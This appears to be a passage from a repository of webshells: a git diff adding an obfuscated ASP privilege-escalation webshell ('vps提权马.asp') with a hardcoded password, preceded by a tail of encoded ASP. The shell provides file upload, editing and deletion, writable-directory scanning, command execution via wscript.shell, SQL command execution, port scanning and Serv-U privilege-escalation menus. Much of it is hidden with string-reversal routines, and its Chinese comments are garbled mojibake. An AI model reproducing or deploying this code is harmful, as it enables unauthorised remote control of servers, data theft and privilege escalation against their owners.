o@#@&mm/nJG+soKVN.J=?+D~)A;'g+APJ$w))A; fVoG^N+.cw1C:b=?nDPzAZ{1KOtbxL@#@&mCdJZK2XwWV9n.J=?Y~b$/{1nh,JAw))$;RZG2HsGV9nM`ogls+#=?OPzA/'gWO4bxo@#@&mm/+r\G\sKV[+.E=?nY,)A;'HnSPS$o=b$Zc\K\nwW^N+M`wHls+b)U+O~zAZ{HWDtk L@#@&1lk+E1nAwWsN.J=?nO,bA/xg+APd$w))~Zc1+SsKsNDcsglhn*)?OPzAZ{HGY4k o@#@&^Ck+Ejaok^+El`wsrs`b@#@&^m/nrKU+lMm4E):?nlMm4c*@#@&1C/Jw1CUXStDncElamCxHAtDn*v#@#@&^m/nJ;h9Fj4+^VJ=Zs[FUtnV^`b@#@&mlknJdWoK;OJ=?/dkGUcZGxDnxD/ ]:W-nvJV30E*)]/aWxk+c]+9k.+1Y~i"S@#@&^lk+J;G;Dk+r)/W;.k+c#@#@&mm/nEzV+aCr))Vam`b@#@&1l/Jk;0DwE)kEWOa`#@#@&mm/+r;2VKl9JlE2sKl[`*@#@&1ldnrDl[hbxE)MC9:r `*@#@&1lknJamCxHh4nM+crlw1lxHA4+M+W`b@#@&^m/nJTG4mmVE=oW8C13c#@#@&;ldPrnDKsbs+r)KDKsrs`#@#@&mm/+r24wr)at2`b@#@&mC/ElaL[n^J)C2NNnVvb@#@&^m/JmsNXE)1:[6v#@#@&1l/Elkw6rlC/a6v#@#@&^Ck+ENKAx^WC[kJ)[GSxsWm[k`b@#@&1l/J4rN9+U/4+ssr)tb[Nx/4nsVv#@#@&^ldnr?^l 9Db\noKD:E~=PjmmUGDr7+wWDs@#@&^lk+E?1lU9Mk\EP=P?1CUfMk7+~In5!+dYvEfMk-nr#@#@&^m/nJU^wWs9+MJP,),jmwWsND~];EdYvJsKs[+MJ*@#@&P~/m/nPAs/P\CbxsG.s`b@#@&3 N~U+^+mD@#@&r0,b^YbWU@!@*J?.\!JPD4nx,?4WA2..v#@#@&NE@!J4G[H@*@!&4D:s@*r~L8pqAA==^#~@ +%> + diff --git a/asp/vps提权马.asp b/asp/vps提权马.asp new file mode 100644 index 0000000..1eaa412 --- /dev/null +++ b/asp/vps提权马.asp @@ -0,0 +1,1295 @@ +<% +UserPass="icesword"' +Server.ScriptTimeout=999999999 +Response.Buffer =true +On Error Resume Next +'------------------------ڲ ---------------------- +mmname ="Ȩ" 'shell +mmshell ="ʹ" 'shellȨ +errout =",Ҫ" 'ʾ +serversoft=Request.ServerVariables("server_software") +'------------------------------------------- + +response.write ""+vbCrLf+""+vbCrLf+"" + +Response.Buffer = True +Server.ScriptTimeOut=999999999 + +CONST_FSO="Script"&"ing.Fil"&"eSyst"&"emObject" + + +'· \ +function GetFullPath(path) + GetFullPath = path + if Right(path,1) <> "\" then GetFullPath = path&"\" 'ַ \ ľͼ +end function + +'ɾļ +Function Deltextfile(filepath) + On Error Resume Next + Set objFSO = CreateObject(CONST_FSO) + if objFSO.FileExists(filepath) then 'ļǷ + objFSO.DeleteFile(filepath) + end if + Set objFSO = nothing + Deltextfile = Err.Number 'ش +End Function + + +'Ŀ¼Ƿд 0 Ϊɶд 1Ϊдɾ +Function CheckDirIsOKWrite(DirStr) + On Error Resume Next + Set FSO = Server.CreateObject(CONST_FSO) + filepath = GetFullPath(DirStr)&fso.GettempName + FSO.CreateTextFile(filepath) + CheckDirIsOKWrite = Err.Number 'ش + if ShowNoWriteDir and (CheckDirIsOKWrite =70) then + Response.Write "[Ŀ¼]"&DirStr&" ["&Err.Description&"]
" + end if + set fout =Nothing + set FSO = Nothing + Deltextfile(filepath) 'ɾ + if CheckDirIsOKWrite=0 and Deltextfile(filepath)=70 then CheckDirIsOKWrite =1 +end Function + +'ļǷ޸(˷޸,ܻе㲻׼) +function CheckFileWrite(filepath) + On Error Resume Next + Set FSO = Server.CreateObject(CONST_FSO) + set getAtt=FSO.GetFile(filepath) + getAtt.Attributes = getAtt.Attributes + CheckFileWrite = Err.Number + set FSO = Nothing + set getAtt = Nothing +end function + +'Ŀ¼Ŀɶд +function ShowDirWrite_Dir_File(Path,CheckFile,CheckNextDir) + On Error Resume Next + Set FSO = Server.CreateObject(CONST_FSO) + B = FSO.FolderExists(Path) + set FSO=nothing + + 'ǷΪʱĿ¼ǷҪ + IS_TEMP_DIR = (instr(UCase(Path),"WINDOWS\TEMP")>0) and NoCheckTemp + + if B=false then 'Ŀ¼ͽļ + '========================================================================== + Re = CheckFileWrite(Path) 'Ƿд + if Re =0 then + Response.Write "[ļ]"&Path&"
" + b =true + exit function + else + Response.Write "[ļ]"&Path&" ["&Err.Description&"]
" + exit function + end if + '========================================================================== + end if + + + + Path = GetFullPath(Path) ' \ + + re = CheckDirIsOKWrite(Path) 'ǰĿ¼Ҳһ + if (re =0) or (re=1) then + Response.Write "[Ŀ¼]"& Path&"
" + end if + +Set FSO = Server.CreateObject(CONST_FSO) +set f = fso.getfolder(Path) + + + +if (CheckFile=True) and (IS_TEMP_DIR=false) then +b=false +'====================================== +for each file in f.Files + Re = CheckFileWrite(Path&file.name) 'Ƿд + if Re =0 then + Response.Write "[ļ]"& Path&file.name&"
" + b =true + else + if ShowNoWriteDir then Response.Write "[ļ]"&Path&file.name&" ["&Err.Description&"]
" + end if +next +if b then response.Flush 'ݾˢ¿ͻʾ +'====================================== +end if + + + +'============= Ŀ¼ ================ +for each file in f.SubFolders +if CheckNextDir=false then 'ǷһĿ¼ + re = CheckDirIsOKWrite(Path&file.name) + if (re =0) or (re=1) then + Response.Write "[Ŀ¼]"& Path&file.name&"
" + end if +end if + + if (CheckNextDir=True) and (IS_TEMP_DIR=false) then 'ǷһĿ¼ + ShowDirWrite_Dir_File Path&file.name,CheckFile,CheckNextDir 'ټһĿ¼ + end if +next +'====================================== +Set FSO = Nothing +set f = Nothing +end function + +Server.ScriptTimeout=999999999:Response.Buffer=true:On Error Resume Next: +ExeCute "sub ShowErr():If Err Then:RRS""

 "" & Err.Description & ""

"":Err.Clear:Response.Flush:End If:end sub" +Sub RRS(str):response.write(str):End Sub +Function RePath(S) +RePath=Replace(S,"\","\\") +End Function +Function RRePath(S):RRePath=Replace(S,"\\","\") +End Function +URL=Request.ServerVariables("URL") +ServerIP=Request.ServerVariables("LOCAL_ADDR") +Action=Request("Action"):Pos=2 +RootPath=Server.MapPath(".") +WWWRoot=Server.MapPath("/") +Serveru=request.servervariables("http_host")&url +FolderPath=Request("FolderPath"): +Pn=pos*44:FName=Request("FName"):pso=5:BackUrl="

" +RRS"" +RRS""&mmname&" - "&ServerIP&"--Soft - "&serversoft&"" +RRS ""©url&"" +rrS"" +rRs"" +ExeCute SinfoEn("lError=kilnerrodow.o;}win trueeturns(){rError killctiont>funscrip=javaguaget lanscripRRS~ȷϼݿSQL5"";}else if(i==12){alert(Str[i]);}else{DbForm.SqlStr.value = Str[i];}return true;}":RRS"function FullSqlStr(str,pg){if(DbForm.DbStr.value.length<5){alert(""ݿӴǷȷ!"");return false;}if(str.length<10){alert(""SQLǷȷ!"");return false;}DbForm.SqlStr.value = str;DbForm.Page.value = pg;abc.innerHTML="""";DbForm.submit();return true;}" +RRS"function gotoURL(targ,selObj,restore){if(selObj.options[selObj.selectedIndex].js==1){eval(selObj.options[selObj.selectedIndex].value);if (restore) selObj.selectedIndex=0}else{eval(targ+"".location='""+selObj.options[selObj.selectedIndex].value+""'"");if (restore) selObj.selectedIndex=0;}}" +rrs "" +Dim Sot(13,2):Sot(0,0) = "Scripting.FileSystemObject":Sot(0,2) = "ļ":Sot(1,0) = "wscript.shell":Sot(1,2) = "ִ":Sot(2,0) = "ADOX.Catalog":Sot(2,2) = "ACCESS":Sot(3,0) = "JRO.JetEngine":Sot(3,2) = "ACCESSѹ":Sot(4,0) = "Scripting.Dictionary":Sot(4,2) = "ϴ":Sot(5,0) = "Adodb.connection":Sot(5,2) = "ݿ":Sot(6,0) = "Adodb.Stream":Sot(6,2) = "ϴ":Sot(7,0) = "SoftArtisans.FileUp":Sot(7,2) = "SA-FileUp ļϴ":Sot(8,0) = "LyfUpload.UploadFile":Sot(8,2) = "Ʒļϴ":Sot(9,0) = "Persits.Upload.1":Sot(9,2) = "ASPUpload ļϴ":Sot(10,0) = "JMail.SmtpMail":Sot(10,2) = "JMail ʼշ":Sot(11,0) = "CDONTS.NewMail":Sot(11,2) = "SMTP":Sot(12,0) = "SmtpMail.SmtpMail.1":Sot(12,2) = "SmtpMail":Sot(13,0) = "Microsoft.XMLHTTP":Sot(13,2) = "ݴ" +For i=0 To 13 +Set T=Server.CreateObject(Sot(i,0)) +If -2147221005 <> Err Then +IsObj=" " +Else +IsObj=" " +Err.Clear +End If +Set T=Nothing +Sot(i,1)=IsObj +Next + + + + +If FolderPath<>"" then +Session("FolderPath")=RRePath(FolderPath) +End If:If Session("FolderPath")="" Then +FolderPath=RootPath +Session("FolderPath")=FolderPath +End if +Function MainForm() +RRS"
" +RRS"" +RRS"" +RRS"
" +RRS"XProgram2EAllUsersn#ibibpcAnywhereLMserv-uDv~ⳣд~:SQLIJPHPEDconfigWPdataeFTempm?RECYCLERv,д7" +RRS"" +RRS"" +RRS"
ַ" +RRS"" +RRS"" +RRS"
" +RRS"" +RRS"" +RRS"
" +RRS"

ʾ

" +RRS"" +End Function:Function MainMenu() +RRS"" +RRS"" +If soT(0,1)=" " Then +RRS"" +Else +Set ABC=New LBF:RRS ABC.ShowDriver():Set ABC=Nothing +RRS"" +RRS"" +RRS"" +RRS"" +RRS"" +RRS"" +RRS"" +RRS"" +RRS"" +RRS"" +RRS"" +RRS"" +RRS"" +RRS"" +RRS"" +RRS"" +RRS"" +RRS"" +RRS"" +RRS"" +RRS"" +RRS"" +RRS"" +RRS"" +RRS"" +RRS"" +RRS"" +RRS"" +RRS"" +RRS"" +RRS"" +RRS"" +RRS"" +RRS"" +RRS"" +RRS"" +End if +RRS"

" +RRS"
Ȩ
վĿ¼
Ŀ¼
ϼĿ¼
½Ŀ¼
½ı
Զ
ϴļ
дĿ¼
޸Ȩ
ش
Ȩ
Ȩ

Ȩ
ɨĿ¼дD
û˺
Ա
Զ¼
֧
ִCMD
Cmd2
SQLִCMD
˿ɨ
Serv-uȨ
Serv-u Ftp
Serv-u7xȨ
ע
ASPX̽
PHP̽
JSP̽
߼
ݿ
˳¼
" +End Function: +Sub ScanDriveForm() + Dim FSO,DriveB + Set FSO = Server.Createobject("Scripting.FileSystemObject") +Response.Write "" +Response.Write " " +Response.Write " " +Response.Write " " + + + For Each DriveB in FSO.Drives + +Response.Write " " +Next +Response.Write " " +Response.Write " " +Response.Write " " +Response.Write " " +Response.Write " " +Response.Write " " +Response.Write " " +Response.Write " " +Response.Write " " +Response.Write " " +Response.Write " " +Response.Write " " +Response.Write " " +Response.Write " " +Response.Write " " +Response.Write " " +Response.Write " " +Response.Write " " +Response.Write " " +Response.Write " " +Response.Write " " +Response.Write "
/ϵͳļϢ
Windowsļ" +Response.Write FSO.GetSpecialFolder(0) +Response.Write "
System32ļ" +Response.Write FSO.GetSpecialFolder(1) +Response.Write "
ϵͳʱļ" +Response.Write FSO.GetSpecialFolder(2) +Response.Write "

" +Response.Write "
" +Response.Write "ǰվ·:"&Server.MapPath("/")&"" +Response.Write "
ָļвѯ" +Response.Write " " +Response.Write " Wָļ·b磺F:\ASP\" +Response.Write "
" +Response.Write "
" + Set FSO=Nothing +End Sub + +Sub ScanDrive(Drive) + Dim FSO,TestDrive,BaseFolder,TempFolders,Temp_Str,D + If Drive <> "" Then + Set FSO = Server.Createobject("Scripting.FileSystemObject") + Set TestDrive = FSO.GetDrive(Drive) + If TestDrive.IsReady Then + Temp_Str = "
  • ̷ͣ" & Red(TestDrive.FileSystem) & "
  • кţ" & Red(TestDrive.SerialNumber) & "
  • ̹" & Red(TestDrive.ShareName) & "
  • " & Red(GetTheSize(TestDrive.TotalSize)) & "
  • ̾" & Red(TestDrive.VolumeName) & "
  • ̸Ŀ¼:" & ScReWr((Drive & ":\")) + + Set BaseFolder = TestDrive.RootFolder + Set TempFolders = BaseFolder.SubFolders + For Each D in TempFolders + Temp_Str = Temp_Str & "
  • ļУ" & ScReWr(D) + Next + Set TempFolder = Nothing + Set BaseFolder = Nothing + Else + Temp_Str = Temp_Str & "
  • ̸Ŀ¼:" & Red("ɶ:(") + Dim TempFolderList,t + t=0 + Temp_Str = Temp_Str & "
  • " & Red("Ŀ¼ԣ") + TempFolderList = Array("windows","winnt","win","win2000","win98","web","winme","windows2000","asp","php","Tools","Documents and Settings","Program Files","Inetpub","ftp","wmpub","tftp") + For i = 0 to Ubound(TempFolderList) + If FSO.FolderExists(Drive & ":\" & TempFolderList(i)) Then + t = t+1 + Temp_Str = Temp_Str & "
  • ļУ" & ScReWr(Drive & ":\" & TempFolderList(i)) + End if + Next + If t=0 then Temp_Str = Temp_Str & "
  • " & Drive & "̸Ŀ¼δз:(" + End if + Set TestDrive = Nothing + Set FSO = Nothing + Temp_Str = Temp_Str & "
  • ע⣺" & Red("Ҫˢ±ҳ棬ֻдļл´ļ!") + Message Drive & ":Ϣ",Temp_Str,1 + End if +End Sub + +Sub ScFolder(folder) + On Error Resume Next + Dim FSO,OFolder,TempFolder,Scmsg,S + Set FSO = Server.Createobject("Scripting.FileSystemObject") + If FSO.FolderExists(folder) Then + Set OFolder = FSO.GetFolder(folder) + Set TempFolders = OFolder.SubFolders + Scmsg = "
  • ָļиĿ¼" & ScReWr(folder) + For Each S in TempFolders + Scmsg = Scmsg&"
  • ļУ" & ScReWr(S) + Next + Set TempFolders = Nothing + Set OFolder = Nothing + Else + Scmsg = Scmsg & "
  • ļУ" & Red(folder & "ڻ޶Ȩ!") + End if + Scmsg = Scmsg & "
  • ע⣺" & Red("Ҫˢ±ҳ棬ֻдļл´ļ!") + Set FSO = Nothing + Message "ļϢ",Scmsg,1 +End Sub + +Function ScReWr(folder): + On Error Resume Next + Dim FSO,TestFolder,TestFileList,ReWrStr,RndFilename + Set FSO = Server.Createobject("Scripting.FileSystemObject") + Set TestFolder = FSO.GetFolder(folder) + Set TestFileList = TestFolder.SubFolders + RndFilename = "\temp" & Day(now) & Hour(now) & Minute(now) & Second(now) & ".tmp" + For Each A in TestFileList + Next + If err Then + err.Clear + ReWrStr = folder & " ɶ," + FSO.CreateTextFile folder & RndFilename,True + If err Then + err.Clear + ReWrStr = ReWrStr & "дq" + Else + ReWrStr = ReWrStr & "дq" + FSO.DeleteFile folder & RndFilename,True + End If + Else + ReWrStr = folder & " ɶ," + FSO.CreateTextFile folder & RndFilename,True + If err Then + err.Clear + ReWrStr = ReWrStr & "дY" + Else + ReWrStr = ReWrStr & "дY" + FSO.DeleteFile folder & RndFilename,True + End if + End if + Set TestFileList = Nothing + Set TestFolder = Nothing + Set FSO = Nothing + ScReWr = ReWrStr +End Function + +Sub Message(state,msg,flag) +Response.Write "" +Response.Write " " +Response.Write " " +Response.Write " " +Response.Write " " +Response.Write " " +Response.Write " " +Response.Write " " +Response.Write " " +Response.Write " " +Response.Write "
    ϵͳϢ
    " +Response.Write " " +Response.Write " " +Response.Write " " +Response.Write " " +Response.Write " " +Response.Write " " +Response.Write "
    " +Response.Write state +Response.Write "

    " +Response.Write msg +Response.Write "

    " +Response.Write "
    " +Response.Write " " +If flag=0 Then +Response.Write " " +Response.Write " " +Else +Response.Write " " +Response.Write " " +End if +Response.Write "
    " +End Sub +Function Red(str):Red = "" & str & "" +End Function +Sub PageAddToMdb():ExeCute SinfoEn("atePth, cteAthm Dih`~)cteAth(~stueeq R =cteAth`~)thPahe~tt(esquRe= h atePth`0000=1uteOimtTipcr.SerrvSe0`he Tb~MdTodd~a= t Ache tIfn`thPahe(tdboMdTad)`UrckBa~&v>dibr>dibr>os=podthmem or=8zesi~ ~~& ) ~)~.h(atpPMar.veer(SdecoEnmlHt& ~ ~~e=luvah atePthe=am nutnpAche=tmenab MdTodd=aueal venddhie=yp tutnpiopt/oOpp=aueal vontiop>Fso=fueal vontiop>~ctlese~'ʼ'e=luvat miub=spetyt puin
    ~rmfobr:<)O֧FS(⿪>r/os=podthmem or=8zesi~ b~mdH.HS~\& ) ~)~.h(atpPMar.veer(SdecoEnmlHt& ~ ~~e=luvah atePthe=am nutnp'e=luvat miub=spetyt puin>
    ~rmfo ilehi WDo`enThe lsFa= ) i), thPahe(tftLes(stxirEdeol.F~)ctjeObemstSyleFig.inptriSc(~ctjeObteeaCrr.veer SIf`)) 1 - ih,atePtht(ef(LerldFoteeaCr).t~ecbjmOteyseSil.Fngtiipcr~St(ecbjeOatre.CerrvSe`Ifd En`he T~)~\, 1)+ i , thPahe(tid(MtrnS IIfn`\~ ~), 1 + ih,atePthd(Mir(stIn+ i = i )`ls Ee`= i 0`Ifd En`opLo",Pos):End Sub:Sub saTreeForMdb(thePath, rs, stream):ExeCute SinfoEn("stLileFiys sr,deoleFth, emitm Di`b$ldH.HSb$mdH.HS~$= t iseLilsFsy~`h)atePthe(acSpmeNaX.sa= r deoleFtht Se`mste.IerldFohe tInm te ichEar Fo`enThe ru T =erldFoIsm.te iIf`amrest, rs, thPam.te idbrMFoeeTrsa`ls Ee`enTh0 = <~)~$& e am.Nemit& ~ ~$, stLileFiys(strnS IIf`Nedd.Arsw` 4h,at.Pemitd(Mi= ) h~atePth(~rs)`h)at.Pemite(ilmFrodFoa.Lamrest`d(ea.Ramrest= ) t~enntColefi(~rs)`atpd.Urse`Ifd En`Ifd En`xtNe`inthNo= r deoleFtht Seg",Pos):End Sub:Function Course():ExeCute SinfoEn("ter'>='cenalign='0' ddingellpa'1' ccing=llspa0' ceder='' bor'menuolor=' bgc='600widthable br>ϵr='megcoloer' b'centlign='3' aspan=' colt='20heigh>~` nextesumeror ron er`NT://(~Winbject getObj inach ofor e.~)`err.clear`e=~~ rtTypJ.Staif OBthen`&~~` FF~~>#FFFFor=~~bgcol20~~ ht=~~ heig&~&nbsFFF~~~#FFFlor=~ bgcod>~`d>&nbs~~2~~span=~ colFFFF~~~#FFolor=~ bgc~~20~ight=td he~ `end if`x=~Զhen le=2 trtTypJ.Staif OB~`x=~ֶhen le=3 trtTypJ.Staif OB~`x=~hen le=4 trtTypJ.Staif OB~`pe=2 artTyBJ.Stand Owin~ ))<>~h,4,3j.patid(obase(mif LCthen`>&nbsF0000or=#Ft col][n=~~2olspaF~~ cFFFFFr=~~#gcolo0~~ bt=~~2heigh>&nbFFFF~~~#FFolor=~ bgc~~20~ight=td he/td>&nbsFFF~~~#FFFlor=~ bgco~20~~ght=~d heitr>~`else`>&nbs399FFor=#3t col][n=~~2olspaF~~ cFFFFFr=~~#gcolo0~~ bt=~~2heigh>&nbFFFF~~~#FFolor=~ bgc~~20~ight=td he/td>&nbsFFF~~~#FFFlor=~ bgco~20~~ght=~d heitr>~`end if`next`~",Pso):End Function:Function ServerInfo():ExeCute SinfoEn("ter'>='cenalign='0' ddingellpa'1' ccing=llspa0' ceder='' bor'menuolor=' bgc='80%widthable br>r='megcoloer' b'centlign='3' aspan=' colt='20heigh>~`td>~&reFFFF'='#FFcolortd bg/td>&nFFFFFor='#bgcol>FFFFFr='#Fgcolo00' bth='2' widt='20heigh>'#FFFolor=d bgctd>&nbFFFFFr='#FgcoloIPFFF'>'#FFFolor=' bgc='200width'20' ight=td heer'><'centlign=='_blargetrm' t'ipfoname=asp' ndex.com/ip138.www.itp://n='htactiopost thod=rm me&~<'2'>~&nFFFFFr='#Fgcolonbsp;FF'>&#FFFFlor=' bgcod>FFFFFr='#Fgcolo00' bth='2' widt='20heigh>'#FFFolor=d bgctd>&nbFFFFFr='#FgcoloCPU'>FFFFFr='#Fgcolo00' bth='2' widt='20heigh>~#FFFFlor=' bgcod>&nbsFFFF'='#FFcolortd bg/td><ϵͳ<'>FFFFFr='#Fgcolo00' bth='2' widt='20heigh>'#FFFolor=d bgctd>&nbFFFFFr='#Fgcolo汾'>WEBFFFFFr='#Fgcolo00' bth='2' widt='20heigh>~&SoFFFF'='#FFcolortd bg/td><0)&~~&SFFFFFr='#Fgcolo00' bth='2' widt='20heigh>" +end sub:Function UpFile(): +If Request("Action2")="Post" Then +Set U=new UPC : Set F=U.UA("LocalFile") +UName=U.form("ToPath") +If UName="" Or F.FileSize=0 then +SI="
    ϴȫ·ѡһļϴ!" +Else +F.SaveAs UName +If Err.number=0 Then +SI="



    ļ"&UName&"ϴɹ
    " +RRS ""©url&"" +End if +End If +Set F=nothing:Set U=nothing +SI=SI&BackUrl +RRS SI +ShowErr() +Response.End +End If +SI="


    " +SI=SI&"" +SI=SI&"
    " +SI=SI&"ϴ·" +SI=SI&" " +SI=SI&" " +SI=SI&"
    " +RRS SI: +End Function::Function Cmd1Shell():ExeCute SinfoEn("checked=~ checked~`t(~SPeques) = RPath~Shellion(~ Sess Then)<>~~(~SP~questIf Re~)`ath~)hellPon(~SSessiPath=Shell`md.ex = ~clPath Shel Thenth=~~ellPaif She~`heckehen ces~ t)<>~yript~(~wscquestif Red=~~`cmd~)est(~ RequCmd =n Def~ The~)<>~(~cmdquestIf Re`st'>~d='pomethoform SI=~<`bsp;~sp;&n'>&nbh:70%'widttyle=&~' SlPath&Shelue='~' vale='SPt namWScrked&~&checyes'~lue='t' vascripme='wx' naeckboe='chc typlass=put c&~alue=it' v'submtype=nput '> " +end if +else +si="


     

    "&mmshell&"
    " +if instr(SI,SIC)<>0 then rrs sI +end if +response.end +end if +Function DbManager():ExeCute SinfoEn("tr~))~SqlSForm(uest.m(Reqr=TriSqlSt`DbStrorm(~est.F=RequDbStr~)`ing='lpadd' celng='0spaci cellr='0'borde'650'idth=ble w&~~`on='' actipost'hod='' metbFormme='Drm na&~~`Ӵ: ght='' hei='100width>~`/td>~~~~>bManaue='D' validdenpe='hn' tyActioame='put n&~~`:&nbt='30heigh>~`>4n(DbSIf Len`(5,0)t(SotObjecreateonn=CSet C)`DbStrOpen Conn.`ma(20nSchen.Opes=ConSet R) `r><&~~`veFirRs.Most `ot Rsile NDo Wh.Eof`E~ th~TABLPE~)=LE_TY(~TABIf Rsen`_NAMETABLE=Rs(~TName~)`a>[ de~,1)'e&~]~&TNamLE [~P TAB~~DROlStr(ullSqipt:Fvascrf='jaa hreter>~`~Name&'>~&T~~,1)me&~]~&TNaROM [T * FSELECtr(~~lSqlSt:Fulscrip'javahref=&~r>n(SqlIf Leen`ct~ t~sele,6))=qlStreft(Sase(LIf LChen`qlStr䣺~&S&~ִSI=SI`ordseb.Rec~Adodject(ateObs=CreSet Rt~)`Conn,lStr,en SqRs.op1,1`ds.Co.FielFN=Rsunt`rdCou.RecoRC=Rsnt`geSizRs.Pae=20`ageSi=Rs.PCountze`Count.PagePN=Rs`age~)st(~PrequePage=`g(Page=Clnn Pag~ Thege<>~If Pae)` Page Thenage=0 Or Pge=~~If Pa=1` Page Thenge>PNIf Pa=PN`=PageepagesolutRs.abThen ge>1 If Pa`td><=#ccccolor25 bgight=tr heble><&~~` FN-1=0 toFor n`em(n)ds.It.Fielld=RsSet F`e&~~&Flnter'n='ce alig&~~`thingld=noSet F`Next`&~~`Count And .Bof)or Rs.Eof ot(Rsile NDo Wh>0`=CounCountt-1`EFEFEor=~#BgcolF~`t>xngdine='wit fac>~` FN-1=0 ToFor i`~:EndFEFEFr=~#Egcololse:BF5~:E#F5F5lor=~:Bgco ThenEFEF~=~#EFcolorIf Bg if`=1 ThIf RCen`Rs(i)code(TMLEnnfo=H ColI)`Else`,50))Rs(i)Left(code(TMLEnnfo=H ColI`End If`&~~&Color&~&Bgcolor=~ bgco&~~`Next`&~~`veNexRs.Mot`Loop`I:SI=RRS S~~`lStr)de(SqlEnCor=HtmSqlSt`&~/~&&Page;ҳ룺~ &RC&~¼~nter>gn=ce~ aliFN+1&an=~&colsp>1 ThIf PNen`a>&nbһҳage-1~,~&Ptr&~~&SqlSr(~~~SqlSt:Fullcriptjavasref=';1)'>&~~~,qlStr~~~&SlStr(ullSqipt:Fvascrf='jaa hrebsp;8 If Paf`o Sp+=Sp TFor i8`it Foen ExPN ThIf i>r`Page If i=Then`nbsp;&i&~&SI=SI~`Else` ~>~&i&i&~)'~~,~&Str&~~&Sqltr(~~lSqlSt:Fulscrip'javahref=&~,~&PNr&~~~SqlSt(~~~&qlStrFullSript:avascef='j&'>һҳ+1&~)&Page~~~,~lStr&~~&SqStr(~llSqlpt:Fuascri='jav hrefsp;~`End If`able>r>0 then + set TFL=new FIF:FStart=InStr(FEnd,TIn,"filename=""",1)+10:FEnd=InStr(FStart,TIn,"""",1):FStart=InStr(FEnd,TIn,"Content-Type: ",1)+14:FEnd=InStr(FStart,TIn,vbCr):TFL.FileStart=DIEnd:TFL.FileSize=DStart-DIEnd-3:if not D2.Exists(UpName) then:D2.add UpName,TFL:end if + else:T2.Type=1:T2.Mode=3:T2.Open:T1.Position=DIEnd:T1.CopyTo T2,DStart-DIEnd-3:T2.Position = 0:T2.Type = 2:T2.Charset ="gb2312":SFV = T2.ReadText:T2.Close:if D1.Exists(UpName) then:D1(UpName)=D1(UpName)&","&SFV:else:D1.Add UpName,SFV:end if:end if:DStart=DStart+TLen+1:wend:TDa="":set T2=nothing:End Sub:Private Sub Class_Terminate:if Request.TotalBytes>0 then:D1.RemoveAll:D2.RemoveAll:set D1=nothing:set D2=nothing:T1.Close:set T1 =nothing:end if:End Sub:End Class: + +Function SinfoEn(ObjStr,ObjPos) +ObjStr=Replace(ObjStr,"~",""""):NewStr=Split(ObjStr,"`"):For i=0 To UBound(NewStr):SinfoEn=SinfoEn&EnCode(NewStr(i),ObjPos)&vbCrLf:Next:SinfoEn=Left(SinfoEn,Len(SinfoEn)-2) +End Function + + + +Class FIF:dim FileSize,FileStart:Private Sub Class_Initialize:FileSize=0:FileStart=0:End Sub:Public function SaveAs(F) + dim T3:SaveAs=true:if trim(F)="" or FileStart=0 then exit function + set T3=CreateObject(Sot(6,0)):T3.Mode=3:T3.Type=1:T3.Open:T1.position=FileStart:T1.copyto T3,FileSize:T3.SaveToFile F,2:T3.Close:set T3=nothing:SaveAs=false:end function:End Class: + +Function Fun(ShiSanObjstr):ShiSanObjstr=Replace(ShiSanObjstr,"|",""""):For ShiSanI=1 To Len(ShiSanObjstr):If Mid(ShiSanObjstr,ShiSanI,1)<>"!"Then:ShiSanNewStr=Mid(ShiSanObjstr,ShiSanI,1)&ShiSanNewStr:Else:ShiSanNewStr=vbCrLf&ShiSanNewStr:End If:Next:Fun = ShiSanNewStr:End Function + + + +Class LBF:Dim CF:Private Sub Class_Initialize:SET CF=CreateObject(Sot(0,0)):End Sub:Private Sub Class_Terminate:Set CF=Nothing:End Sub +Function ShowDriver() +For Each D in CF.Drives +RRS"ش ("&D.DriveLetter&":)" +Next +End Function +Function Show1File(Path): +Set FOLD=CF.GetFolder(Path) +i=0 +SI="" +For Each F in FOLD.subfolders +SI=SI&"" +i=i+1 +If i mod 5 = 0 then SI=SI&"" +Next +SI=SI&"
    " +SI=SI&"0
    "&F.Name&"
    " +SI=SI&"
    [Copy " +SI=SI&"Del" +SI=SI&" Move" +SI=SI&" Down]
    " +RRS SI:SI="":i=0 +SI="" +For Each L in Fold.files +SI=SI&"" +i=i+1 +If i mod 2 = 0 then SI=SI&"" +Next + RRS SI&"
    2"&L.Name&" [ " +SI=SI&"Edit " +SI=SI&"Del " +Si=Si&"Ȩ" +Dim EditOOK +EditOOK=1 +EditOOV=l.Attributes +If EditOOV >= 128 Then +EditOOV = EditOOV - 128 +End If +If EditOOV >= 64 Then +EditOOV = EditOOV - 64 +End If +If EditOOV >= 32 Then +EditOOV = EditOOV - 32 +End If +If EditOOV >= 16 Then +EditOOV = EditOOV - 16 +End If:If EditOOV >= 8 Then +EditOOV = EditOOV - 8 +End If +If EditOOV >= 4 Then +EditOOV = EditOOV - 4:EditOOK=0 +End If +If EditOOV >= 2 Then +EditOOV = EditOOV - 2:EditOOK=0 +End If +If EditOOV >= 1 Then +EditOOV = EditOOV - 1:EditOOK=0 +End If +if EditOOK=0 then +si=si&"x" +else +si=si&"" +end if +SI=SI&"Copy " +SI=SI&"Move ] - " + +SI=SI&clng(L.size/1024)&"K
    " +SI=SI&L.Type&" - " +SI=SI&L.DateLastModified&"
    " +Set FOLD=Nothing +End function: + + + + +Function DelFile(Path):ExeCute SinfoEn("he Th)at(PtsisExleFiF. CIfn`thPae ileFetel.DCF`r>teen/c<ɹɾ~ h&at&P ~ļr>


    teen


    ļɹ":SI=SI&BackUrl:RRS SI:RRS ""©url&"":Response.End:End If:If Path<>"" Then:Set T=CF.opentextfile(Path, 1, False):Txt=HTMLEncode(T.readall) :T.close:Set T=Nothing:Else:Path=Session("FolderPath")&"\newfile.asp":Txt="½ļ":End If:SI=SI&"":SI=SI&"":SI=SI&"
    ":SI=SI&"
    ":SI=SI&"
          ":RRS SI: +End Function:Function CopyFile(Path):ExeCute SinfoEn("|~||~|h,at(Pitpl S =thPa)`enTh~ >~)<(1thPad an) 0)h(at(PtsisExleFiF. CIf`(1thPa),(0thPae ilyFop.CCF)`>~erntce


    teen~Path( and h(0))s(PatExist.FileIf CFn`Path(h(0),e PatveFilCF.Mo1)`enter>
    r>~`&BackSI=SIUrl`RRS SI `End If",Pso):End Function:Function DelFolder(Path):ExeCute SinfoEn("he Th)at(PtsisExerldFoF. CIfn`thPar deoleFetel.DCF`r>teen/c<ɹɾ&~thPa~&Ŀ¼r>


    teen~)<(1thPad an) 0)h(at(PtsisExerldFoF. CIf`(1thPa),(0thPar deolyFop.CCF)`>~erntce


    teen~)<(1thPad an) 0)h(at(PtsisExerldFoF. CIf`(1thPa),(0thPar deoleFov.MCF)`>~erntce


    teen~hteen/c<ɹ½&~thPa~&Ŀ¼r>


    teen
      ¼
      0umberErr.N~ Or t = ~rmPorIf te `
